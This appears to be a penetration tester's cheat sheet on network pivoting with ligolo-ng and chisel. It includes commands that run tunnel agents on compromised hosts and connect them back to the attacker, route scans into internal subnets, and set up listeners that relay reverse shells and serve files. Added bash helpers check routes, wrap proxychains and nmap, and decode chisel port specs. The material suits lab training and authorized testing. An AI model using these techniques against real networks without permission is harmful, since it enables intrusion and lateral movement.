ligolo-ng
Convenient for pivoting into an internal network and running nmap through the tunnel. With listeners it can also catch reverse shells and serve files from a web server on kali.
first init (once, on kali: create the tun interface the proxy will use):
sudo ip tuntap add user rightevil mode tun ligolo
sudo ip link set ligolo up
start the proxy on kali (self-signed cert, listens on 11601 by default)
./proxy -selfcert
agent connect (run on the compromised host; -ignore-cert because the proxy uses a self-signed cert)
windows
.\agent.exe -connect 192.168.45.248:11601 -ignore-cert
linux
./agent -connect 192.168.45.153:11601 -ignore-cert
choose session
session
enumerate the agent host's interfaces (shows the internal subnet to route)
ifconfig
add a route for the internal network (the subnet seen in ifconfig) via the tun interface
sudo ip route add 172.16.216.0/24 dev ligolo
select the session and start the tunnel
session
start
then scan directly from kali (the scanned range must fall inside a route you added on the ligolo interface, otherwise the packets never enter the tunnel)
nmap -sn 172.16.1.0/24
set listener (opens a port on the agent host and forwards it to a port on kali; internal hosts connect to the agent's IP, so reverse shells and file downloads can reach kali)
listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443
  (agent:443 -> kali 127.0.0.1:443; a listener on kali port 443 catches the reverse shell)
listener_add --addr 0.0.0.0:81 --to 127.0.0.1:80
  (agent:81 -> kali 127.0.0.1:80; a web server on kali port 80 serves files at http://<agent ip>:81/)
list listeners
listener_list
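The ligolo-ng sequence above wrapped into a small bash helper, as an added example that is not part of ligolo-ng: it creates the tun device, adds routes, and before scanning checks that the target range lies entirely inside a route on the ligolo interface, which is the mistake that makes nmap silently report nothing when the scanned subnet differs from the routed one. The interface name ligolo and the user rightevil are the page's values; DRY_RUN and PIVOT_DEMO are hypothetical knobs that print the privileged commands instead of running them.

```shell
#!/usr/bin/env bash
# ligolo-ng pivot helper: added example, not ligolo-ng's own tooling.
# Hypothetical assumptions: tun device "ligolo", user "rightevil", routes tracked in
# LIGOLO_ROUTES, DRY_RUN=1 prints privileged commands instead of executing them.
set -u
LIGOLO_IF="${LIGOLO_IF:-ligolo}"
LIGOLO_USER="${LIGOLO_USER:-rightevil}"
LIGOLO_ROUTES=""

run() { if [ "${DRY_RUN:-0}" = 1 ]; then echo "+ $*"; else "$@"; fi; }

ip_to_int() {            # 172.16.216.10 -> 32-bit integer, pure shell arithmetic
    local IFS=.
    set -- $1
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}
int_to_ip() { echo "$(( $1 >> 24 & 255 )).$(( $1 >> 16 & 255 )).$(( $1 >> 8 & 255 )).$(( $1 & 255 ))"; }

cidr_mask() { echo $(( (0xffffffff << (32 - $1)) & 0xffffffff )); }   # prefix length -> netmask

cidr_contains() {        # cidr_contains 172.16.216.0/24 172.16.216.10 -> exit 0 if the IP is inside
    local net="${1%/*}" mask
    mask=$(cidr_mask "${1#*/}")
    [ $(( $(ip_to_int "$net") & mask )) -eq $(( $(ip_to_int "$2") & mask )) ]
}

route_covers() {         # route_covers ROUTE_CIDR TARGET (IP or CIDR): is the whole target inside the route?
    local base bits mask first last
    case "$2" in */*) base="${2%/*}"; bits="${2#*/}";; *) base="$2"; bits=32;; esac
    mask=$(cidr_mask "$bits")
    first=$(( $(ip_to_int "$base") & mask ))
    last=$(( first | (~mask & 0xffffffff) ))
    # routes and targets are contiguous, so first+last inside the route means all of it is
    cidr_contains "$1" "$(int_to_ip "$first")" && cidr_contains "$1" "$(int_to_ip "$last")"
}

ligolo_tun_up() {        # one-time: create the tun device the proxy binds to
    run sudo ip tuntap add user "$LIGOLO_USER" mode tun "$LIGOLO_IF"
    run sudo ip link set "$LIGOLO_IF" up
}

ligolo_route_add() {     # route an internal subnet into the tunnel and remember it
    run sudo ip route add "$1" dev "$LIGOLO_IF"
    LIGOLO_ROUTES="$LIGOLO_ROUTES $1"
}

scan_target_ok() {       # exit 0 if some added route covers the whole scan target
    local r
    for r in $LIGOLO_ROUTES; do route_covers "$r" "$1" && return 0; done
    return 1
}

ligolo_nmap() {          # ligolo_nmap TARGET [nmap opts]; refuses targets that would not enter the tunnel
    local target="$1"; shift
    if ! scan_target_ok "$target"; then
        echo "ligolo_nmap: $target not covered by routes on $LIGOLO_IF (${LIGOLO_ROUTES:-none}); add one first" >&2
        return 1
    fi
    run nmap "$@" "$target"
}

if [ "${PIVOT_DEMO:-0}" = 1 ]; then
    DRY_RUN=1
    ligolo_tun_up
    ligolo_route_add 172.16.216.0/24
    ligolo_nmap 172.16.216.0/24 -sn          # allowed: inside the added route
    ligolo_nmap 172.16.1.0/24 -sn || true    # refused: nothing routes it into the tunnel
fi
```

Run with PIVOT_DEMO=1 to see the dry-run; drop DRY_RUN to execute for real after the proxy has started and the session's tunnel is up.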
chisel
!!!important!!!
the client and server versions must match (mismatched versions fail to connect)
the socks proxy cannot catch a reverse shell from the internal network!!!
Because chisel is less common, it is sometimes not detected or blocked by firewalls/AV.
But nmap through the socks proxy is slower, and only full-connect TCP scans (-sT) work, no SYN, UDP or ICMP ping. The socks proxy itself cannot receive a reverse shell, since connections only go from kali outward; to catch one through chisel use a forward port forward on the client (no R: prefix, so the listener opens on the pivot), or use a ligolo-ng listener instead.
socks proxy
kali:
chisel server --port 8080 --reverse
target:
run in background
Start-Job -ScriptBlock { c:\my\chisel.exe client 192.168.45.223:8080 R:socks }
/tmp/chisel client 192.168.45.153:8080 R:socks > /dev/null 2>&1 &
or run in the foreground
c:\my\chisel.exe client 192.168.45.223:8080 R:socks
/tmp/chisel client 192.168.45.153:8080 R:socks
then run tools through the proxy to reach the internal network (chisel's reverse socks listens on 127.0.0.1:1080 on kali by default, e.g. point proxychains at it)
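A helper for the socks step, as an added example that is neither chisel's nor proxychains' own code: it writes a proxychains-ng config pointing at chisel's socks listener and wraps nmap so that scan types which cannot traverse a socks proxy (SYN, UDP, ICMP ping sweeps, OS detection) are rejected up front instead of silently returning nothing. It assumes the server was started with --reverse and the client used R:socks, so the listener is 127.0.0.1:1080 on kali (chisel's default for a socks remote), and that proxychains-ng is installed as proxychains4; the config path and SOCKS_DEMO knob are hypothetical.

```shell
#!/usr/bin/env bash
# chisel socks pivot helper: added example, not chisel's or proxychains' own code.
# Assumes: chisel server on kali with --reverse, client ran "R:socks", so the SOCKS5
# listener is 127.0.0.1:1080 on kali (chisel's default for a socks remote), and
# proxychains-ng is installed as "proxychains4". Paths below are hypothetical.
set -u

write_proxychains_conf() {   # write_proxychains_conf /tmp/pc.conf [port]
    local path="$1" port="${2:-1080}"
    cat > "$path" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $port
EOF
}

socks_nmap_args() {
    # A socks proxy only relays full TCP connections, so raw-socket scans (SYN, UDP,
    # ICMP ping, OS detection, traceroute) never reach the internal network. Reject
    # those, force -sT -Pn, and print the resulting argument list.
    local a out="-sT -Pn"
    for a in "$@"; do
        case "$a" in
            -sS|-sU|-sn|-sP|-sA|-sF|-sX|-sN|-O|-PE|-PP|-PS*|-PA*|-PU*|--traceroute)
                echo "socks_nmap_args: '$a' needs raw packets/ICMP, which cannot go through socks" >&2
                return 1 ;;
            -sT|-Pn) ;;            # already forced
            *) out="$out $a" ;;
        esac
    done
    echo "$out"
}

socks_nmap() {               # socks_nmap /tmp/pc.conf 172.16.216.10 -p 22,80,445
    local conf="$1" args; shift
    args=$(socks_nmap_args "$@") || return 1
    # shellcheck disable=SC2086  # splitting $args into separate options is intended
    proxychains4 -q -f "$conf" nmap $args
}

if [ "${SOCKS_DEMO:-0}" = 1 ]; then
    write_proxychains_conf /tmp/chisel-pc.conf 1080
    socks_nmap /tmp/chisel-pc.conf 172.16.216.10 -p 22,80,445
fi
```

-Pn is forced because host discovery would also need ICMP or raw TCP probes; without it nmap reports every proxied host as down. For a sweep, scan a handful of common ports with -sT -Pn -p instead of the -sn ping sweep used through ligolo-ng.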
port forward
reverse mode (R: prefix): the listener opens on the server (kali) and traffic exits from the client (target), so a port on the target side becomes reachable on kali
forward mode (no prefix): the listener opens on the client (target) and traffic exits from the server (kali)
Reverse forwards are more common than forward ones, because the firewall usually stops us from connecting in to the target but lets the target connect out to us.
server:
chisel server --port 8080 --reverse
chisel.exe server --port 8080 --reverse
client:
/tmp/chisel client 192.168.45.153:8080 R:8000:127.0.0.1:8000
.\chisel.exe client 192.168.45.153:8080 R:8000:127.0.0.1:8000
run in background
/tmp/chisel client 192.168.45.153:8080 R:8000:127.0.0.1:8000 &
Start-Job -ScriptBlock { .\chisel.exe client 192.168.45.153:8080 R:8000:127.0.0.1:8000 }
more than one port (the port after the server address must match the one given to chisel server --port)
/tmp/chisel client 192.168.45.153:51234 R:8000:127.0.0.1:8000 R:8443:127.0.0.1:8443
# "R:" marks a reverse forward, i.e. the listener is created on the chisel server (kali); the listen address defaults to 0.0.0.0
# Effectively: kali listens on :8000 and :8443, and the traffic comes out of the target at 127.0.0.1:8000 and 127.0.0.1:8443
just append another remote spec
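Because the remote syntax is where chisel forwards go wrong (which side listens, what R: means), here is a small bash decoder, added as an example and not part of chisel, that takes a remote spec and states which side opens the listener and where the traffic comes out. It follows the format documented in chisel's README ([R:]local-host:local-port:remote-host:remote-port, local-host defaulting to 0.0.0.0, "socks" in place of remote-host:remote-port with a default of 127.0.0.1:1080); IPv6 literals in brackets are not handled, and the "(attack box)"/"(pivot)" labels assume the usual layout from this page where the server runs on kali and the client on the compromised host.

```shell
#!/usr/bin/env bash
# Decode a chisel "remote" spec and say which side listens: added example, not chisel's code.
# Format per chisel's README: [R:]<local-host>:<local-port>:<remote-host>:<remote-port>
#   - local-host defaults to 0.0.0.0; "socks" may replace remote-host:remote-port,
#     in which case the default listener is 127.0.0.1:1080
#   - R: = reverse: the listener is created on the chisel server instead of the client
# Assumption: IPv4 addresses / hostnames only (bracketed IPv6 literals are not parsed);
# server = attack box (kali), client = pivot host, as used on this page.
set -u

chisel_remote_explain() {
    local spec="$1" side="client" lhost="0.0.0.0" lport="" rhost="" rport="" f1 f2 f3 f4 n
    case "$spec" in R:*) side="server"; spec="${spec#R:}" ;; esac
    n=$(printf '%s' "$spec" | tr -cd ':' | wc -c); n=$((n))   # number of ':' separators
    IFS=: read -r f1 f2 f3 f4 <<EOF
$spec
EOF
    case "$n" in
        0) [ "$f1" = socks ] || return 1; lhost=127.0.0.1; lport=1080; rhost=socks ;;  # "socks"
        1) [ "$f2" = socks ] || return 1; lhost=127.0.0.1; lport="$f1"; rhost=socks ;; # "5000:socks"
        2) if [ "$f3" = socks ]; then lhost="$f1"; lport="$f2"; rhost=socks            # "0.0.0.0:1080:socks"
           else lport="$f1"; rhost="$f2"; rport="$f3"; fi ;;                           # "8000:127.0.0.1:8000"
        3) lhost="$f1"; lport="$f2"; rhost="$f3"; rport="$f4" ;;                       # "10.0.0.5:8000:127.0.0.1:8000"
        *) return 1 ;;
    esac
    [ -n "$lport" ] || return 1
    local listener dialer
    if [ "$side" = server ]; then
        listener="server (attack box)"; dialer="client (pivot)"
    else
        listener="client (pivot)"; dialer="server (attack box)"
    fi
    if [ "$rhost" = socks ]; then
        echo "$listener listens on $lhost:$lport as SOCKS5; connections exit from the $dialer"
    else
        echo "$listener listens on $lhost:$lport -> $dialer connects to $rhost:$rport"
    fi
}

chisel_remote_listener() {   # which side must have the port free: "server" or "client"
    case "$1" in R:*) echo server ;; *) echo client ;; esac
}

if [ "${CHISEL_DEMO:-0}" = 1 ]; then
    for s in R:8000:127.0.0.1:8000 4444:127.0.0.1:4444 R:socks 1080:socks; do
        printf '%-24s %s\n' "$s" "$(chisel_remote_explain "$s")"
    done
fi
```

Reading the two directions side by side is the point: R:8000:127.0.0.1:8000 makes kali listen and the pivot dial out, which exposes an internal-only service on the attack box, while 4444:127.0.0.1:4444 makes the pivot listen and kali receive, which is the shape needed to catch a reverse shell from the internal network.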